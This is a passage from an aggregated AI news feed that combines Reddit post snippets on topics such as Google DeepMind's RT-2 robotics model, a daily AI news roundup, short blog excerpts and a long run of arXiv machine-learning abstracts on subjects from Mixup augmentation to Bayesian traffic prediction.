until he is president and can mandate the consumption of Big Macs for Breakfast, Lunch, and Dinner. I still can't believe I'm getting paid to do this... Anyway, please take a moment to download and check it out, and if you have any thoughts, questions, or comments, please feel free to contact me! During this limited beta phase, your feedback will be invaluable. submitted by /u/SamuelAnonymous [link] [comments]  ( 9 min )
    Google Deepmind presents RT-2, the first vision-language-action (VLA) Robotics Transformer, and it may have drastic implications for our future.
    The latest article published by Google Deepmind is seriously approaching a Blade Runner type future. Their research paper is on the first VLA (vision-language-action) Model RT-2 (see paper), a multi-modal algorithm which tokenizes robotic inputs and output actions (e.g., camera images, task instructions, and motor commands) in order to use this information to learn quickly by translating the knowledge it receives in real-time into generalized instructions for its own robotic control. RT-1 absorbs large amounts of data, including robot trajectories with multiple tasks, objects and environments, resulting in better performance and generalization. (source) RT-2 incorporates chain-of-thought to allow for multi-stage semantic reasoning, like deciding which object could be used as an improvise…  ( 10 min )
    A famous French YouTuber named Joueur Du Grenier discovers he has an unofficial AI voice channel, and the AI voices are insanely good
    submitted by /u/the_anonymizer [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/28/2023
    Google introduces Robotic Transformer 2 (RT-2), a novel vision-language-action (VLA) model that learns from both web and robotics data, and translates this knowledge into generalized instructions for robotic control, while retaining web-scale capabilities.[1] Thymia, a healthtech startup building gamified AI tools to revolutionize how we assess and monitor mental health, has today announced a €2.4 million seed round to expand the reach and capabilities of its pioneering technology.[2] Intel CEO Pat Gelsinger was very bullish on AI during the company’s Q2 2023 earnings call — telling investors that Intel plans to “build AI into every product that we build.”[3] Walmart is using artificial intelligence to help streamline their product organization.[4] Sources: [1] https://www.deepmind.com/blog/rt-2-new-model-translates-vision-and-language-into-action [2] https://www.eu-startups.com/2023/07/london-based-thymia-raises-e2-4-million-seed-round-to-expand-its-video-game-inspired-mental-health-ai/ [3] https://www.theverge.com/2023/7/27/23810360/intel-pat-gelsinger-ai-every-platform-promise [4] https://www.nbcnews.com/nightly-news/video/walmart-using-ai-to-streamline-organization-what-will-it-mean-for-workers-189519429834 submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    [UPDATE] I fear the future of AI
    Hi, guys! Hope everyone is doing fine. Some of you may remember me. About two months ago I posted here about an anxiety breakdown I've gone through regarding "AI", "Programming" and how "human programmers would end" and stuff like that, which was a major concern for me since programming was my job and my favorite thing to do. I was wondering for some time if I was supposed to share an update here. I decided to do so since somebody out there may be feeling the same as me. So I not only have an update but I also want to give some advice to whoever is going through this sh*thole. After that post, I talked about my feelings with a lot of people around me (friends and fiancée), and everyone was very supportive. At first I thought they would laugh at me, since there are a lot more to worry to…  ( 12 min )
    AI chan the essential worker [OC]
    submitted by /u/leonleungjeehei [link] [comments]  ( 8 min )
    Google is training robots the way it trains AI chatbots
    “RT-2 is the new version of what the company calls its vision-language-action (VLA) model. The model teaches robots to better recognize visual and language patterns to interpret instructions and infer what objects work best for the request.” submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    What are Receptive Fields and How Do They Affect Your Model?
    submitted by /u/CkmCpvis [link] [comments]  ( 8 min )
    Researchers Discover New Vulnerability in Large Language Models
    submitted by /u/nickb [link] [comments]  ( 8 min )
    "Gzip beats BERT?" Part 2: dataset issues, improved speed, and results
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Detection Transformer (DETR) Explained
    submitted by /u/Personal-Trainer-541 [link] [comments]  ( 8 min )
    Introduction to “AI & Data Literacy: Empowering Citizens of Data Science”
    One of the reasons that I moved back to Iowa last year was that I saw an opportunity to work with local educational institutions to create an AI Institute for organizations in middle America that either get overlooked in the AI conversation or are unsure what AI means to them. I wanted to reduce the… Read More »Introduction to “AI & Data Literacy: Empowering Citizens of Data Science” The post Introduction to “AI & Data Literacy: Empowering Citizens of Data Science” appeared first on Data Science Central.  ( 22 min )
    Ruzsa distance
    A few days ago I wrote about Jaccard distance, a way of defining a distance between sets. The Ruzsa distance is similar, except it defines the distance between two subsets of an Abelian group. Subset difference Let A and B be two subsets of an Abelian (commutative) group G. Then the difference A − B […] Ruzsa distance first appeared on John D. Cook.  ( 6 min )
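    The excerpt cuts off before stating the distance itself. From the standard additive-combinatorics literature, the Ruzsa distance is d(A, B) = log(|A − B| / √(|A||B|)), where A − B is the set of all differences a − b. A small sketch for subsets of Z_n:

    ```python
    import math

    def ruzsa_distance(A, B, n):
        """d(A, B) = log(|A - B| / sqrt(|A| * |B|)) for subsets of Z_n,
        where A - B = {a - b mod n : a in A, b in B}."""
        diff = {(a - b) % n for a in A for b in B}
        return math.log(len(diff) / math.sqrt(len(A) * len(B)))

    # For a subgroup H, the difference set H - H is H itself, so d(H, H) = 0:
    ruzsa_distance({0, 2, 4}, {0, 2, 4}, 6)  # -> 0.0
    ```

    Note it is not a true metric in the usual sense: d(A, A) = 0 only for highly structured sets like subgroups, which is exactly what makes it useful as a measure of additive structure.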
    Spectral learning of Bernoulli linear dynamical systems models. (arXiv:2303.02060v2 [stat.ML] UPDATED)
    Latent linear dynamical systems with Bernoulli observations provide a powerful modeling framework for identifying the temporal dynamics underlying binary time series data, which arise in a variety of contexts such as binary decision-making and discrete stochastic processes (e.g., binned neural spike trains). Here we develop a spectral learning method for fast, efficient fitting of probit-Bernoulli latent linear dynamical system (LDS) models. Our approach extends traditional subspace identification methods to the Bernoulli setting via a transformation of the first and second sample moments. This results in a robust, fixed-cost estimator that avoids the hazards of local optima and the long computation time of iterative fitting procedures like the expectation-maximization (EM) algorithm. In regimes where data is limited or assumptions about the statistical structure of the data are not met, we demonstrate that the spectral estimate provides a good initialization for Laplace-EM fitting. Finally, we show that the estimator provides substantial benefits to real world settings by analyzing data from mice performing a sensory decision-making task.
    MixupE: Understanding and Improving Mixup from Directional Derivative Perspective. (arXiv:2212.13381v4 [cs.LG] UPDATED)
    Mixup is a popular data augmentation technique for training deep neural networks where additional samples are generated by linearly interpolating pairs of inputs and their labels. This technique is known to improve the generalization performance in many learning paradigms and applications. In this work, we first analyze Mixup and show that it implicitly regularizes infinitely many directional derivatives of all orders. Based on this new insight, we propose an improved version of Mixup, theoretically justified to deliver better generalization performance than the vanilla Mixup. To demonstrate the effectiveness of the proposed method, we conduct experiments across various domains such as images, tabular data, speech, and graphs. Our results show that the proposed method improves Mixup across multiple datasets using a variety of architectures, for instance, exhibiting an improvement over Mixup by 0.8% in ImageNet top-1 accuracy.
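    Vanilla Mixup, the baseline this paper analyzes and extends, is only a few lines: a convex combination of two inputs and their one-hot labels, with the mixing weight drawn from a Beta distribution. A sketch of that sample generation (the alpha value is illustrative):

    ```python
    import random

    def mixup_pair(x1, y1, x2, y2, alpha=0.2):
        """Vanilla mixup: x = lam*x1 + (1-lam)*x2, y = lam*y1 + (1-lam)*y2,
        with lam ~ Beta(alpha, alpha)."""
        lam = random.betavariate(alpha, alpha)
        x = [lam * a + (1 - lam) * b for a, b in zip(x1, x2)]
        y = [lam * a + (1 - lam) * b for a, b in zip(y1, y2)]
        return x, y, lam
    ```

    The paper's contribution (MixupE) changes how this interpolation is justified and regularized, not the basic recipe above.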
    Gaussian Latent Representations for Uncertainty Estimation using Mahalanobis Distance in Deep Classifiers. (arXiv:2305.13849v2 [cs.CV] UPDATED)
    Recent works show that the data distribution in a network's latent space is useful for estimating classification uncertainty and detecting Out-of-distribution (OOD) samples. To obtain a well-regularized latent space that is conducive for uncertainty estimation, existing methods bring in significant changes to model architectures and training procedures. In this paper, we present a lightweight, fast, and high-performance regularization method for Mahalanobis distance-based uncertainty prediction, and that requires minimal changes to the network's architecture. To derive Gaussian latent representation favourable for Mahalanobis Distance calculation, we introduce a self-supervised representation learning method that separates in-class representations into multiple Gaussians. Classes with non-Gaussian representations are automatically identified and dynamically clustered into multiple new classes that are approximately Gaussian. Evaluation on standard OOD benchmarks shows that our method achieves state-of-the-art results on OOD detection with minimal inference time, and is very competitive on predictive probability calibration. Finally, we show the applicability of our method to a real-life computer vision use case on microorganism classification.
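    For readers unfamiliar with the score being regularized: the Mahalanobis distance measures how far a sample sits from a class mean in units of the class covariance, and large values flag likely OOD samples. A sketch with a diagonal covariance for brevity (in practice a full covariance matrix is used):

    ```python
    import math

    def mahalanobis_diag(x, mean, var):
        """Mahalanobis distance with a diagonal covariance (one variance per
        feature): sqrt(sum_i (x_i - mu_i)^2 / var_i). With unit variances it
        reduces to the plain Euclidean distance."""
        return math.sqrt(sum((xi - mi) ** 2 / vi for xi, mi, vi in zip(x, mean, var)))

    mahalanobis_diag([3.0, 4.0], [0.0, 0.0], [1.0, 1.0])  # -> 5.0 (Euclidean case)
    ```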
    Efficient Approximations of Complete Interatomic Potentials for Crystal Property Prediction. (arXiv:2306.10045v7 [physics.chem-ph] UPDATED)
    We study property prediction for crystal materials. A crystal structure consists of a minimal unit cell that is repeated infinitely in 3D space. How to accurately represent such repetitive structures in machine learning models remains unresolved. Current methods construct graphs by establishing edges only between nearby nodes, thereby failing to faithfully capture infinite repeating patterns and distant interatomic interactions. In this work, we propose several innovations to overcome these limitations. First, we propose to model physics-principled interatomic potentials directly instead of only using distances as in many existing methods. These potentials include the Coulomb potential, London dispersion potential, and Pauli repulsion potential. Second, we model the complete set of potentials among all atoms, instead of only between nearby atoms as in existing methods. This is enabled by our approximations of infinite potential summations with provable error bounds. We further develop efficient algorithms to compute the approximations. Finally, we propose to incorporate our computations of complete interatomic potentials into message passing neural networks for representation learning. We perform experiments on the JARVIS and Materials Project benchmarks for evaluation. Results show that the use of interatomic potentials and complete interatomic potentials leads to consistent performance improvements with reasonable computational costs. Our code is publicly available as part of the AIRS library (https://github.com/divelab/AIRS/tree/main/OpenMat/PotNet).
    TimeTuner: Diagnosing Time Representations for Time-Series Forecasting with Counterfactual Explanations. (arXiv:2307.09916v3 [cs.HC] UPDATED)
    Deep learning (DL) approaches are being increasingly used for time-series forecasting, with many efforts devoted to designing complex DL models. Recent studies have shown that the DL success is often attributed to effective data representations, fostering the fields of feature engineering and representation learning. However, automated approaches for feature learning are typically limited with respect to incorporating prior knowledge, identifying interactions among variables, and choosing evaluation metrics to ensure that the models are reliable. To improve on these limitations, this paper contributes a novel visual analytics framework, namely TimeTuner, designed to help analysts understand how model behaviors are associated with localized correlations, stationarity, and granularity of time-series representations. The system mainly consists of the following two-stage technique: We first leverage counterfactual explanations to connect the relationships among time-series representations, multivariate features and model predictions. Next, we design multiple coordinated views including a partition-based correlation matrix and juxtaposed bivariate stripes, and provide a set of interactions that allow users to step into the transformation selection process, navigate through the feature space, and reason the model performance. We instantiate TimeTuner with two transformation methods of smoothing and sampling, and demonstrate its applicability on real-world time-series forecasting of univariate sunspots and multivariate air pollutants. Feedback from domain experts indicates that our system can help characterize time-series representations and guide the feature engineering processes.
    Duet: efficient and scalable hybriD neUral rElation undersTanding. (arXiv:2307.13494v3 [cs.DB] UPDATED)
Learned cardinality estimation methods have achieved high precision compared to traditional methods. Among learned methods, query-driven approaches have long faced the problem of data and workload drift. Although both query-driven and hybrid methods have been proposed to avoid this problem, even the state of the art among them suffers from high training and estimation costs, limited scalability, instability, and long-tailed distribution problems on high-cardinality, high-dimensional tables, which seriously affect the practical application of learned cardinality estimators. In this paper, we prove that most of these problems are directly caused by the widely used progressive sampling. We solve this problem by introducing predicates into the autoregressive model and propose Duet, a stable, efficient, and scalable hybrid method that estimates cardinality directly without sampling or any non-differentiable process, which not only reduces the inference complexity from $O(n)$ to $O(1)$ compared to Naru and UAE but also achieves higher accuracy on high-cardinality, high-dimensional tables. Experimental results show that Duet achieves all the design goals above, is much more practical, and even has a lower inference cost on CPU than that of most learned methods on GPU.
    PlaSma: Making Small Language Models Better Procedural Knowledge Models for (Counterfactual) Planning. (arXiv:2305.19472v2 [cs.CL] UPDATED)
    Procedural planning, which entails decomposing a high-level goal into a sequence of temporally ordered steps, is an important yet intricate task for machines. It involves integrating common-sense knowledge to reason about complex contextualized situations that are often counterfactual, e.g. "scheduling a doctor's appointment without a phone". While current approaches show encouraging results using large language models (LLMs), they are hindered by drawbacks such as costly API calls and reproducibility issues. In this paper, we advocate planning using smaller language models. We present PlaSma, a novel two-pronged approach to endow small language models with procedural knowledge and (counterfactual) planning capabilities. More concretely, we develop symbolic procedural knowledge distillation to enhance the implicit knowledge in small language models and an inference-time algorithm to facilitate more structured and accurate reasoning. In addition, we introduce a novel task, Counterfactual Planning, that requires a revision of a plan to cope with a counterfactual situation. In both the original and counterfactual setting, we show that orders-of-magnitude smaller models (770M-11B parameters) can compete and often surpass their larger teacher models' capabilities.
    Non Intrusive Intelligibility Predictor for Hearing Impaired Individuals using Self Supervised Speech Representations. (arXiv:2307.13423v2 [cs.SD] UPDATED)
Self-supervised speech representations (SSSRs) have been successfully applied to a number of speech-processing tasks, e.g. as feature extractors for speech quality (SQ) prediction, which is, in turn, relevant for assessing and training speech enhancement systems for users with normal or impaired hearing. However, exact knowledge of why and how quality-related information is encoded well in such representations remains poorly understood. In this work, techniques for non-intrusive prediction of SQ ratings are extended to the prediction of intelligibility for hearing-impaired users. It is found that self-supervised representations are useful as input features to non-intrusive prediction models, achieving competitive performance compared with more complex systems. A detailed analysis of the performance depending on Clarity Prediction Challenge 1 listeners and enhancement systems indicates that more data might be needed to allow generalisation to unknown systems and (hearing-impaired) individuals.
    Fraunhofer SIT at CheckThat! 2023: Tackling Classification Uncertainty Using Model Souping on the Example of Check-Worthiness Classification. (arXiv:2307.02377v2 [cs.CL] UPDATED)
This paper describes the second-placed approach developed by the Fraunhofer SIT team in the CLEF-2023 CheckThat! lab Task 1B for English. Given a text snippet from a political debate, the aim of this task is to determine whether it should be assessed for check-worthiness. Detecting check-worthy statements aims to facilitate manual fact-checking efforts by prioritizing the claims that fact-checkers should consider first. It can also be considered a primary step of a fact-checking system. Our best-performing method took advantage of an ensemble classification scheme centered on Model Souping. When applied to the English data set, our submitted model achieved an overall F1 score of 0.878 and was ranked as the second-best model in the competition.
    Factor Fields: A Unified Framework for Neural Fields and Beyond. (arXiv:2302.01226v3 [cs.CV] UPDATED)
    We present Factor Fields, a novel framework for modeling and representing signals. Factor Fields decomposes a signal into a product of factors, each represented by a classical or neural field representation which operates on transformed input coordinates. This decomposition results in a unified framework that accommodates several recent signal representations including NeRF, Plenoxels, EG3D, Instant-NGP, and TensoRF. Additionally, our framework allows for the creation of powerful new signal representations, such as the "Dictionary Field" (DiF) which is a second contribution of this paper. Our experiments show that DiF leads to improvements in approximation quality, compactness, and training time when compared to previous fast reconstruction methods. Experimentally, our representation achieves better image approximation quality on 2D image regression tasks, higher geometric quality when reconstructing 3D signed distance fields, and higher compactness for radiance field reconstruction tasks. Furthermore, DiF enables generalization to unseen images/3D scenes by sharing bases across signals during training which greatly benefits use cases such as image regression from sparse observations and few-shot radiance field reconstruction.
    Fraunhofer SIT at CheckThat! 2023: Mixing Single-Modal Classifiers to Estimate the Check-Worthiness of Multi-Modal Tweets. (arXiv:2307.00610v2 [cs.LG] UPDATED)
The option of sharing images, videos and audio files on social media opens up new possibilities for distinguishing between false information and fake news on the Internet. Due to the vast amount of data shared every second on social media, not all data can be verified by a computer or a human expert. Here, a check-worthiness analysis can be used as a first step in the fact-checking pipeline and as a filtering mechanism to improve efficiency. This paper proposes a novel way of detecting the check-worthiness of multi-modal tweets. It takes advantage of two classifiers, each trained on a single modality. For image data, extracting the embedded text with an OCR analysis has been shown to perform best. By combining the two classifiers, the proposed solution was able to place first in the CheckThat! 2023 Task 1A with an F1 score of 0.7297 achieved on the private test set.
    Formulation Graphs for Mapping Structure-Composition of Battery Electrolytes to Device Performance. (arXiv:2307.03811v2 [cond-mat.mtrl-sci] UPDATED)
Advanced computational methods are being actively sought to address the challenges associated with the discovery and development of new combinatorial materials, such as formulations. A widely adopted approach involves domain-informed high-throughput screening of individual components that can be combined into a formulation. This manages to accelerate the discovery of new compounds for a target application but still leaves the process of identifying the right 'formulation' from the shortlisted chemical space largely a laboratory experiment-driven process. We report a deep learning model, the Formulation Graph Convolution Network (F-GCN), that can map the structure-composition relationship of the individual components to the property of the liquid formulation as a whole. Multiple GCNs are assembled in parallel that featurize formulation constituents domain-intuitively on the fly. The resulting molecular descriptors are scaled based on the respective constituent's molar percentage in the formulation, then formalized into a combined descriptor that represents a complete formulation to an external learning architecture. The use of the proposed formulation learning model is demonstrated for battery electrolytes by training and testing it on two exemplary datasets representing electrolyte formulations vs. battery performance -- one dataset is sourced from the literature on Li/Cu half-cells, while the other is obtained by lab experiments related to lithium-iodide full-cell chemistry. The model is shown to predict performance metrics such as Coulombic Efficiency (CE) and specific capacity of new electrolyte formulations with the lowest reported errors. The best-performing F-GCN model uses molecular descriptors derived from molecular graphs that are informed with HOMO-LUMO and electric moment properties of the molecules using a knowledge transfer technique.
    Experimental Study on Reinforcement Learning-based Control of an Acrobot. (arXiv:2011.09246v2 [cs.RO] UPDATED)
We present computational and experimental results on how artificial intelligence (AI) learns to control an Acrobot using reinforcement learning (RL). The experimental setup is designed as an embedded system, which is of interest for robotics and energy harvesting applications. Specifically, we study the control of the angular velocity of the Acrobot, as well as control of its total energy, which is the sum of the kinetic and the potential energy. By this means the RL algorithm is designed to drive the angular velocity or the energy of the first pendulum of the Acrobot towards a desired value. With this, libration or full rotation of the unactuated pendulum of the Acrobot is achieved. Moreover, investigations of the Acrobot control are carried out, which lead to insights about the influence of the state space discretization, the episode length, the action space, and the mass of the driven pendulum on the RL control. Through numerous further simulations and experiments, the effects of parameter variations are evaluated.
    Deep Bradley-Terry Rating: Estimate Properties Without Metric of Unseen Items. (arXiv:2307.13709v2 [cs.LG] UPDATED)
Many properties in the real world, such as desirability or strength in a competitive environment, cannot be directly observed, which makes them difficult to evaluate. To deal with this challenging problem, prior works have primarily focused on estimating those properties for known items, especially the strength of sports players, and only for those who appear in a paired-comparison dataset. In this paper, we introduce Deep Bradley-Terry Rating (DBTR), a novel ML framework to evaluate any properties of unknown items, not necessarily present in the training data. Our method seamlessly integrates the traditional Bradley-Terry model with a neural network structure. We also generalize this architecture further to asymmetric environments with unfairness, which are much more common in real-world settings. In our experimental analysis, DBTR successfully learned the desired quantification of those properties.
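The classical Bradley-Terry core that DBTR builds on can be sketched as follows (a minimal NumPy version where ratings are free parameters fit by gradient ascent, rather than outputs of a neural network as in DBTR):

```python
import numpy as np

def bt_prob(r_i, r_j):
    """Bradley-Terry: P(i beats j) = sigmoid(r_i - r_j)."""
    return 1.0 / (1.0 + np.exp(-(r_i - r_j)))

def fit_ratings(n_items, wins, lr=0.5, n_iter=500):
    """Maximize the pairwise log-likelihood; wins is a list of (winner, loser) pairs."""
    r = np.zeros(n_items)
    for _ in range(n_iter):
        grad = np.zeros(n_items)
        for w, l in wins:
            p = bt_prob(r[w], r[l])   # current win probability
            grad[w] += 1 - p          # winner's rating pushed up
            grad[l] -= 1 - p          # loser's rating pushed down
        r += lr * grad / len(wins)
    return r - r.mean()               # ratings are identifiable only up to a shift

# item 0 beats item 1 in three of four games -> fitted P(0 beats 1) should approach 3/4
r = fit_ratings(2, [(0, 1), (0, 1), (0, 1), (1, 0)])
```

DBTR replaces the free rating vector with a network that maps item features to a rating, so unseen items can also be scored.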
    Deep learning of quantum entanglement from incomplete measurements. (arXiv:2205.01462v6 [quant-ph] CROSS LISTED)
The quantification of the entanglement present in a physical system is of paramount importance for fundamental research and many cutting-edge applications. Currently, achieving this goal requires either a priori knowledge on the system or very demanding experimental procedures such as full state tomography or collective measurements. Here, we demonstrate that by employing neural networks we can quantify the degree of entanglement without needing to know the full description of the quantum state. Our method allows for direct quantification of the quantum correlations using an incomplete set of local measurements. Despite using undersampled measurements, we achieve a quantification error of up to an order of magnitude lower than the state-of-the-art quantum tomography. Furthermore, we achieve this result employing networks trained using exclusively simulated data. Finally, we derive a method based on a convolutional network input that can accept data from various measurement scenarios and perform, to some extent, independently of the measurement device.
    Algorithmic Gaussianization through Sketching: Converting Data into Sub-gaussian Random Designs. (arXiv:2206.10291v2 [cs.LG] UPDATED)
    Algorithmic Gaussianization is a phenomenon that can arise when using randomized sketching or sampling methods to produce smaller representations of large datasets: For certain tasks, these sketched representations have been observed to exhibit many robust performance characteristics that are known to occur when a data sample comes from a sub-gaussian random design, which is a powerful statistical model of data distributions. However, this phenomenon has only been studied for specific tasks and metrics, or by relying on computationally expensive methods. We address this by providing an algorithmic framework for gaussianizing data distributions via averaging, proving that it is possible to efficiently construct data sketches that are nearly indistinguishable (in terms of total variation distance) from sub-gaussian random designs. In particular, relying on a recently introduced sketching technique called Leverage Score Sparsified (LESS) embeddings, we show that one can construct an $n\times d$ sketch of an $N\times d$ matrix $A$, where $n\ll N$, that is nearly indistinguishable from a sub-gaussian design, in time $O(\text{nnz}(A)\log N + nd^2)$, where $\text{nnz}(A)$ is the number of non-zero entries in $A$. As a consequence, strong statistical guarantees and precise asymptotics available for the estimators produced from sub-gaussian designs (e.g., for least squares and Lasso regression, covariance estimation, low-rank approximation, etc.) can be straightforwardly adapted to our sketching framework. We illustrate this with a new approximation guarantee for sketched least squares, among other examples.
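The sketch-and-solve idea underlying this line of work can be illustrated with a plain Gaussian sketch (a simple stand-in for the LESS embeddings the paper analyzes; matrix sizes and noise level are arbitrary):

```python
import numpy as np

rng = np.random.default_rng(0)
N, d, n = 2000, 5, 200                    # tall data matrix, much smaller sketch
A = rng.normal(size=(N, d))
b = A @ np.ones(d) + 0.01 * rng.normal(size=N)  # noisy linear model, true solution = ones

# plain Gaussian sketching matrix (stand-in for the LESS embeddings in the paper)
S = rng.normal(size=(n, N)) / np.sqrt(n)

x_full, *_ = np.linalg.lstsq(A, b, rcond=None)            # solve with all N rows
x_sketch, *_ = np.linalg.lstsq(S @ A, S @ b, rcond=None)  # solve with n sketched rows
```

The sketched problem has a tenth of the rows yet yields nearly the same least-squares solution, which is the kind of guarantee the sub-gaussian design analysis makes precise.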
    Group Equivariant Fourier Neural Operators for Partial Differential Equations. (arXiv:2306.05697v2 [cs.LG] UPDATED)
    We consider solving partial differential equations (PDEs) with Fourier neural operators (FNOs), which operate in the frequency domain. Since the laws of physics do not depend on the coordinate system used to describe them, it is desirable to encode such symmetries in the neural operator architecture for better performance and easier learning. While encoding symmetries in the physical domain using group theory has been studied extensively, how to capture symmetries in the frequency domain is under-explored. In this work, we extend group convolutions to the frequency domain and design Fourier layers that are equivariant to rotations, translations, and reflections by leveraging the equivariance property of the Fourier transform. The resulting $G$-FNO architecture generalizes well across input resolutions and performs well in settings with varying levels of symmetry. Our code is publicly available as part of the AIRS library (https://github.com/divelab/AIRS).
    Learning Common Rationale to Improve Self-Supervised Representation for Fine-Grained Visual Recognition Problems. (arXiv:2303.01669v2 [cs.CV] UPDATED)
Self-supervised learning (SSL) strategies have demonstrated remarkable performance in various recognition tasks. However, both our preliminary investigation and recent studies suggest that they may be less effective in learning representations for fine-grained visual recognition (FGVR), since many features helpful for optimizing SSL objectives are not suitable for characterizing the subtle differences in FGVR. To overcome this issue, we propose learning an additional screening mechanism to identify discriminative clues commonly seen across instances and classes, dubbed common rationales in this paper. Intuitively, common rationales tend to correspond to the discriminative patterns from the key parts of foreground objects. We show that a common rationale detector can be learned by simply exploiting the GradCAM induced from the SSL objective without using any pre-trained object parts or saliency detectors, allowing it to be seamlessly integrated into the existing SSL process. Specifically, we fit the GradCAM with a branch of limited fitting capacity, which allows the branch to capture the common rationales and discard the less common discriminative patterns. At the test stage, the branch generates a set of spatial weights to selectively aggregate features representing an instance. Extensive experimental results on four visual tasks demonstrate that the proposed method can lead to a significant improvement in different evaluation settings.
    Reasons for the Superiority of Stochastic Estimators over Deterministic Ones: Robustness, Consistency and Perceptual Quality. (arXiv:2211.08944v3 [eess.IV] UPDATED)
Stochastic restoration algorithms make it possible to explore the space of solutions that correspond to the degraded input. In this paper we reveal additional fundamental advantages of stochastic methods over deterministic ones, which further motivate their use. First, we prove that any restoration algorithm that attains perfect perceptual quality and whose outputs are consistent with the input must be a posterior sampler, and is thus required to be stochastic. Second, we illustrate that while deterministic restoration algorithms may attain high perceptual quality, this can be achieved only by filling up the space of all possible source images using an extremely sensitive mapping, which makes them highly vulnerable to adversarial attacks. Indeed, we show that enforcing deterministic models to be robust to such attacks profoundly hinders their perceptual quality, while robustifying stochastic models hardly influences their perceptual quality and improves their output variability. These findings provide a motivation to foster progress in stochastic restoration methods, paving the way to better recovery algorithms.
    A Bayesian approach to quantifying uncertainties and improving generalizability in traffic prediction models. (arXiv:2307.05946v3 [cs.LG] UPDATED)
Deep-learning models for traffic data prediction can have superior performance in modeling complex functions using a multi-layer architecture. However, a major drawback of these approaches is that most of them do not offer forecasts with uncertainty estimates, which are essential for traffic operations and control. Without uncertainty estimates, it is difficult to place any level of trust in the model predictions, and operational strategies relying on overconfident predictions can lead to worsening traffic conditions. In this study, we propose a Bayesian recurrent neural network framework for uncertainty quantification in traffic prediction with higher generalizability by introducing spectral normalization to its hidden layers. In our paper, we show that normalization alters the training process of deep neural networks by controlling the model's complexity and reducing the risk of overfitting to the training data. This, in turn, helps improve the generalization performance of the model on out-of-distribution datasets. Results demonstrate that spectral normalization improves uncertainty estimates and significantly outperforms both layer normalization and the model without normalization in single-step prediction horizons. This improved performance can be attributed to the ability of spectral normalization to better localize the feature space of the data under perturbations. Our findings are especially relevant to traffic management applications, where predicting traffic conditions across multiple locations is the goal, but the availability of training data from multiple locations is limited. Spectral normalization therefore provides a more generalizable approach that can effectively capture the underlying patterns in traffic data without requiring location-specific models.
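Spectral normalization itself is simple to sketch: divide a weight matrix by its largest singular value, estimated by power iteration (a minimal NumPy version; real layers carry the power-iteration vector across training steps rather than restarting it):

```python
import numpy as np

def spectral_normalize(W, n_iter=200, seed=0):
    """Rescale W to have unit spectral norm, with the top singular value
    estimated by power iteration (as in spectral normalization layers)."""
    rng = np.random.default_rng(seed)
    u = rng.normal(size=W.shape[0])
    for _ in range(n_iter):
        v = W.T @ u
        v /= np.linalg.norm(v)
        u = W @ v
        u /= np.linalg.norm(u)
    sigma = u @ W @ v                 # estimate of the largest singular value
    return W / sigma

W = np.random.default_rng(1).normal(size=(8, 4))
W_sn = spectral_normalize(W)
```

Bounding the spectral norm of each layer bounds the layer's Lipschitz constant, which is the mechanism behind the improved out-of-distribution behavior described above.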
    Visual Pre-training for Navigation: What Can We Learn from Noise?. (arXiv:2207.00052v3 [cs.CV] UPDATED)
    One powerful paradigm in visual navigation is to predict actions from observations directly. Training such an end-to-end system allows representations useful for downstream tasks to emerge automatically. However, the lack of inductive bias makes this system data inefficient. We hypothesize a sufficient representation of the current view and the goal view for a navigation policy can be learned by predicting the location and size of a crop of the current view that corresponds to the goal. We further show that training such random crop prediction in a self-supervised fashion purely on synthetic noise images transfers well to natural home images. The learned representation can then be bootstrapped to learn a navigation policy efficiently with little interaction data. The code is available at https://yanweiw.github.io/noise2ptz
    Pre-Training with Diffusion models for Dental Radiography segmentation. (arXiv:2307.14066v2 [cs.CV] UPDATED)
    Medical radiography segmentation, and specifically dental radiography, is highly limited by the cost of labeling which requires specific expertise and labor-intensive annotations. In this work, we propose a straightforward pre-training method for semantic segmentation leveraging Denoising Diffusion Probabilistic Models (DDPM), which have shown impressive results for generative modeling. Our straightforward approach achieves remarkable performance in terms of label efficiency and does not require architectural modifications between pre-training and downstream tasks. We propose to first pre-train a Unet by exploiting the DDPM training objective, and then fine-tune the resulting model on a segmentation task. Our experimental results on the segmentation of dental radiographs demonstrate that the proposed method is competitive with state-of-the-art pre-training methods.
    Towards Out-Of-Distribution Generalization: A Survey. (arXiv:2108.13624v2 [cs.LG] UPDATED)
    Traditional machine learning paradigms are based on the assumption that both training and test data follow the same statistical pattern, which is mathematically referred to as Independent and Identically Distributed ($i.i.d.$). However, in real-world applications, this $i.i.d.$ assumption often fails to hold due to unforeseen distributional shifts, leading to considerable degradation in model performance upon deployment. This observed discrepancy indicates the significance of investigating the Out-of-Distribution (OOD) generalization problem. OOD generalization is an emerging topic of machine learning research that focuses on complex scenarios wherein the distributions of the test data differ from those of the training data. This paper represents the first comprehensive, systematic review of OOD generalization, encompassing a spectrum of aspects from problem definition, methodological development, and evaluation procedures, to the implications and future directions of the field. Our discussion begins with a precise, formal characterization of the OOD generalization problem. Following that, we categorize existing methodologies into three segments: unsupervised representation learning, supervised model learning, and optimization, according to their positions within the overarching learning process. We provide an in-depth discussion on representative methodologies for each category, further elucidating the theoretical links between them. Subsequently, we outline the prevailing benchmark datasets employed in OOD generalization studies. To conclude, we overview the existing body of work in this domain and suggest potential avenues for future research on OOD generalization. A summary of the OOD generalization methodologies surveyed in this paper can be accessed at this http URL
    Statistical process monitoring of artificial neural networks. (arXiv:2209.07436v2 [stat.ME] UPDATED)
    The rapid advancement of models based on artificial intelligence demands innovative monitoring techniques which can operate in real time with low computational costs. In machine learning, especially if we consider artificial neural networks (ANNs), the models are often trained in a supervised manner. Consequently, the learned relationship between the input and the output must remain valid during the model's deployment. If this stationarity assumption holds, we can conclude that the ANN provides accurate predictions. Otherwise, the retraining or rebuilding of the model is required. We propose considering the latent feature representation of the data (called "embedding") generated by the ANN to determine the time when the data stream starts being nonstationary. In particular, we monitor embeddings by applying multivariate control charts based on the data depth calculation and normalized ranks. The performance of the introduced method is compared with benchmark approaches for various ANN architectures and different underlying data formats.
    Efficient Alternating Minimization with Applications to Weighted Low Rank Approximation. (arXiv:2306.04169v2 [cs.LG] UPDATED)
